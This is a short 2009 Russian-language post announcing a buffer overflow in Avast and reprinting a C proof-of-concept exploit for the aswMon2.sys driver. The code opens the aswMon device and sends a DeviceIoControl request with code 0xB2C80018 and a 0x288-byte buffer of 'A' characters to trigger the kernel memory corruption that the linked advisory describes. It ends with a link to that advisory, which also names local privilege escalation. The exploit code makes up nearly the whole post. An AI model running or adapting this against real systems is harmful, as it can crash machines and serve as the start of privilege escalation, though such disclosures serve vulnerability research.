
28.09.2009, 07:28
Переполнение буфера в Avast:
Avast-aswMon2-expl.c
24 сентября, 2009
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <wchar.h>
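/*
 * Open a read/write handle to a device by its Win32 device name.
 *
 * DriverName - NUL-terminated device name without the "\\.\" prefix.
 * lphDevice  - receives the opened handle on success; left untouched on
 *              failure.
 *
 * Returns TRUE on success. Returns FALSE when an argument is NULL, when the
 * prefixed name does not fit in MAX_PATH characters, or when CreateFileW()
 * fails (the error code is printed).
 */
BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab
{
    WCHAR DeviceName[MAX_PATH];
    const WCHAR *Prefix;
    HANDLE hDevice;

    if (DriverName == NULL || lphDevice == NULL) {
        printf("OpenDevice() ERROR invalid argument\n");
        return FALSE;
    }

    /* The low byte of GetVersion() is the OS major version; 5 and later
     * get the Global\ prefix. */
    if ((GetVersion() & 0xFF) >= 5) {
        Prefix = L"\\\\.\\Global\\";
    } else {
        Prefix = L"\\\\.\\";
    }

    /* An unbounded wcscpy/wcscat pair would write past DeviceName for a
     * long DriverName, so the combined length (plus terminator) is checked
     * before anything is copied. */
    if (wcslen(Prefix) + wcslen(DriverName) >= MAX_PATH) {
        printf("OpenDevice() ERROR device name too long\n");
        return FALSE;
    }
    wcscpy(DeviceName, Prefix);
    wcscat(DeviceName, DriverName);
    printf("Opening.. %S\n", DeviceName);

    /* Share mode 0: the handle is opened for exclusive access. */
    hDevice = CreateFileW(DeviceName, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                          OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        /* GetLastError() returns a DWORD (unsigned long), hence %lu. */
        printf("CreateFile() ERROR %lu\n", GetLastError());
        return FALSE;
    }

    *lphDevice = hDevice;
    return TRUE;
}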
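/*
 * Reproduction case for the aswMon2.sys issue named in the advisory linked
 * after this listing.
 *
 * Opens the "aswMon" device, sends a single DeviceIoControl request with
 * control code 0xB2C80018 whose input and output buffers are the same
 * 0x288-byte region filled with 'A', reports the outcome, then releases the
 * buffer and the handle. Always returns 0.
 *
 * NOTE(review): the advisory title describes kernel memory corruption, so on
 * an affected driver build the request may not return cleanly; the fixed
 * driver version is not stated on this page - confirm it in the advisory.
 */
int main() {
    HANDLE hDev = NULL;
    DWORD Junk = 0;
    char *Buff;

    if (!OpenDevice(L"aswMon", &hDev)) {
        printf("Unable to access aswMon");
        return(0);
    }

    /* NOTE(review): nothing visible here executes from this buffer, so
     * PAGE_READWRITE would appear sufficient - confirm before changing. */
    Buff = (char *)VirtualAlloc(NULL, 0x288, MEM_RESERVE | MEM_COMMIT,
                                PAGE_EXECUTE_READWRITE);
    if (Buff) {
        memset(Buff, 'A', 0x288);

        /* Check the result so that a driver which rejects the request is
         * reported as such instead of being logged as a success. */
        if (DeviceIoControl(hDev, 0xB2C80018, Buff, 0x288, Buff, 0x288,
                            &Junk, (LPOVERLAPPED)NULL)) {
            printf("DeviceIoControl Executed..\n");
        } else {
            printf("DeviceIoControl() ERROR %lu\n", GetLastError());
        }

        VirtualFree(Buff, 0, MEM_RELEASE);
    } else {
        /* GetLastError() returns a DWORD (unsigned long), hence %lu. */
        printf("VirtualAlloc() ERROR %lu\n", GetLastError());
    }

    /* The device handle was previously left open on every path. */
    CloseHandle(hDev);
    return(0);
}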
https://www.evilfingers.com/advisory/Advisory/Avast_aswMon2.sys_kernel_memory_corruption_and_Local_Privilege_Escalation.php